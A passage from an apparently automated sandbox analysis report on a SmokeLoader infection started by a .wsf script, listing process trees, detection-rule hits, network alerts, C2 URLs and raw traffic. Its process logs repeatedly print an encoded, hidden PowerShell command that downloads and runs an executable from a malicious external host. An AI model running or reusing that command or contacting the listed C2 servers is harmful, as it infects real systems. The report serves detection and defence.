JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6364, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 2472, ProcessName: powershell.exe
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\fbhbvci, CommandLine: C:\Users\user\AppData\Roaming\fbhbvci, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\fbhbvci, NewProcessName: C:\Users\user\AppData\Roaming\fbhbvci, OriginalFileName: C:\Users\user\AppData\Roaming\fbhbvci, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\fbhbvci, ProcessId: 4264, ProcessName: fbhbvci
        Source: Process startedAuthor: frack113: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6364, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 2472, ProcessName: powershell.exe
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\UkHkCa3IYV.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7100, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 6364, ProcessName: cmd.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\UkHkCa3IYV.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\UkHkCa3IYV.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\UkHkCa3IYV.wsf", ProcessId: 7100, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6364, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 2472, ProcessName: powershell.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T16:36:29.436868+020020391031A Network Trojan was detected192.168.2.449737193.46.217.7880TCP
        2024-10-04T16:36:30.523268+020020391031A Network Trojan was detected192.168.2.449747188.40.141.21180TCP
        2024-10-04T16:36:30.892140+020020391031A Network Trojan was detected192.168.2.449747188.40.141.21180TCP
        2024-10-04T16:36:47.544969+020020391031A Network Trojan was detected192.168.2.449842193.46.217.7880TCP
        2024-10-04T16:36:47.910544+020020391031A Network Trojan was detected192.168.2.449747188.40.141.21180TCP
        2024-10-04T16:36:48.298416+020020391031A Network Trojan was detected192.168.2.449747188.40.141.21180TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T16:35:38.057425+020020197142Potentially Bad Traffic192.168.2.449730193.46.217.7880TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\Users\user\AppData\Roaming\fbhbvciAvira: detection malicious, Label: HEUR/AGEN.1312567
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
        Source: 00000005.00000002.1994744005.00000000006B0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeReversingLabs: Detection: 87%
        Source: C:\Users\user\AppData\Roaming\fbhbvciReversingLabs: Detection: 87%
        Source: UkHkCa3IYV.wsfReversingLabs: Detection: 26%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Source: C:\Users\user\AppData\Roaming\fbhbvciJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 188.40.141.211:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 193.46.217.78:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49842 -> 193.46.217.78:80
        Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 193.46.217.78 80Jump to behavior
        Source: Malware configuration extractorURLs: http://unicexpertmagazine.pw/index.php
        Source: Malware configuration extractorURLs: http://ceoconstractionstore.pl/index.php
        Source: Malware configuration extractorURLs: http://openclehardware.ru/index.php
        Source: Malware configuration extractorURLs: http://informcoopirationunicolceo.ru/index.php
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Fri, 04 Oct 2024 14:35:37 GMTContent-Type: application/x-msdos-programContent-Length: 222720Connection: closeLast-Modified: Wed, 02 Oct 2024 05:06:08 GMTETag: "36600-62377654eb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 a7 01 00 50 00 00 00 00 50 11 00 e0 a1 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a4 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 7e 01 00 00 10 00 00 00 80 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 20 00 00 00 90 01 00 00 22 00 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 7f 0f 00 00 c0 01 00 00 18 00 00 00 a6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 1d 05 00 00 00 40 11 00 00 06 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 a1 01 00 00 50 11 00 00 a2 01 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: bestmagazineforanimalsunicum.ruConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
        Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
        Source: Joe Sandbox ViewASN Name: CUBENODEES CUBENODEES
        Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49730 -> 193.46.217.78:80
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ntswbucbclbamtp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: unicexpertmagazine.pw
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbjmxbcxvhys.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: ceoconstractionstore.pl
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyofcjcswoxlynm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: ceoconstractionstore.pl
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gqhcklmysxvvdkln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: unicexpertmagazine.pw
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxrvulqitgtfsjfu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: ceoconstractionstore.pl
        Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjkcaufqdqecw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: ceoconstractionstore.pl
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: bestmagazineforanimalsunicum.ruConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: bestmagazineforanimalsunicum.ru
        Source: global trafficDNS traffic detected: DNS query: unicexpertmagazine.pw
        Source: global trafficDNS traffic detected: DNS query: ceoconstractionstore.pl
        Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ntswbucbclbamtp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: unicexpertmagazine.pw
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 14:36:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 75 6e 69 63 65 78 70 65 72 74 6d 61 67 61 7a 69 6e 65 2e 70 77 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0
